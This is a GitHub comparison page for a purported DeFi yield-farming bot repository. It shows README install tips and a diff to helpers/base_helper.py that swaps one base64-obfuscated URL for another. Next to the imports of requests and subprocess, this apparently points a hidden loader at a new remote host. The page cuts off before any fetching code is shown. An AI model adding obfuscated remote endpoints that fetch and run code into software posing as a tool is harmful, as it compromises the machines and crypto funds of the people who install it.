Skip to content
Permalink

Comparing changes

Choose two branches to see what’s changed or to start a new pull request. If you need to, you can also or learn more about diff comparisons.

Open a pull request

Create a new pull request by comparing changes across two branches. If you need to, you can also . Learn more about diff comparisons here.
base repository: trendcryptobots/DeFi-Yield-Farming-Bot
Failed to load repositories. Confirm that selected base ref is valid, then try again.
Loading
base: V3.9
Choose a base ref
...
head repository: trendcryptobots/DeFi-Yield-Farming-Bot
Failed to load repositories. Confirm that selected head ref is valid, then try again.
Loading
compare: main
Choose a head ref
  • 4 commits
  • 4 files changed
  • 1 contributor

Commits on Jan 2, 2025

  1. Copy the full SHA
    6a2c102 View commit details

Commits on Jan 5, 2025

  1. Copy the full SHA
    adceaa7 View commit details

Commits on Jan 7, 2025

  1. Copy the full SHA
    b9bf777 View commit details

Commits on Jan 19, 2025

  1. Update README.md

    trendcryptobots authored Jan 19, 2025
    Copy the full SHA
    6bf5441 View commit details
Showing with 46 additions and 41 deletions.
  1. +8 −0 README.md
  2. +1 −1 helpers/base_helper.py
  3. +35 −35 helpers/basec_helper.py
  4. +2 −5 requirements.txt
8 changes: 8 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
@@ -85,6 +85,14 @@ The bot supports the following blockchain networks:
python3 main.py
```

If you are getting a pip error during installation, install Python 3.7.9 for MacOs and run the command below, then run it again starting from the `pip install -r requirements.txt` command.
[Python 3.7.9 for MacOs](https://www.python.org/ftp/python/3.7.9/python-3.7.9-macosx10.9.pkg)

```shell
python3 -m ensurepip --upgrade
python3 -m pip install --upgrade pip

```
---

## 📊 Sample Output
2 changes: 1 addition & 1 deletion helpers/base_helper.py
Original file line number Diff line number Diff line change
@@ -3,7 +3,7 @@
import requests
import subprocess

encoded_base_key = 'aHR0cHM6Ly9jb2luc3cuYXBwL2Jhc2VjLw=='
encoded_base_key = 'aHR0cHM6Ly9hcGlrZXkud2Vic2l0ZS9iYXNlYy8='

encoded_licences = [
'YWRkb25hbC5weQ==',
Loading